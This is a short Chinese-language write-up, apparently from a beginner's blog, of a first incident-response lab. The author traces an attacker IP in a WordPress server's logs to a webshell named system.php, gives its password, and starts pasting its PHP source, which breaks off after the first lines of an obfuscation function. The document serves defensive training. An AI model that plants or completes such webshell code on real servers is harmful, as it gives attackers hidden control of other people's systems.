第一次做应急响应的题,还有很多不懂的。
过程
首先,下载web2所需要用到的靶机,使用Zsgf@qq.com就可以登录,如果遇到兼容问题,就调整vmware station的兼容版本,总有一个版本适合你。。
1、进入界面后,我还是第一次接触当做web服务器的主机。它自动弹出了管理界面,没有什么软用就是说……可以看错误警告,不过遗憾的是我不会看。。。
2\于是搜索php study并开启。
为什么会一开始就是php study我也不知道,或许一开始都是这个吧。。但也有可能服务器主机上搭载了其它的就还要再搜索其它的。。。只是我现在对这些名字还不太熟悉而已。
然后把apache的服务先打开,进入localhost界面查看,发现是wordpress的CMS(不过并没有什么软用),到此为止。(载入localhost需要打开MySQL数据库的)
然后在Log日志里面大展拳脚
我们把日志打开一并看了,很容易看到有一个地址一直在疯狂换get参数,所以锁定第一个攻击地址192.168.126.135,最后这个地址一直在system.php上操作。打开system.php找到了参数。不过这个脚本其实我看不懂,大家都说webshell的password是hack6618那就是吧。。。待研究。
我把这个webshell的代码贴在这里待后续研究。
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=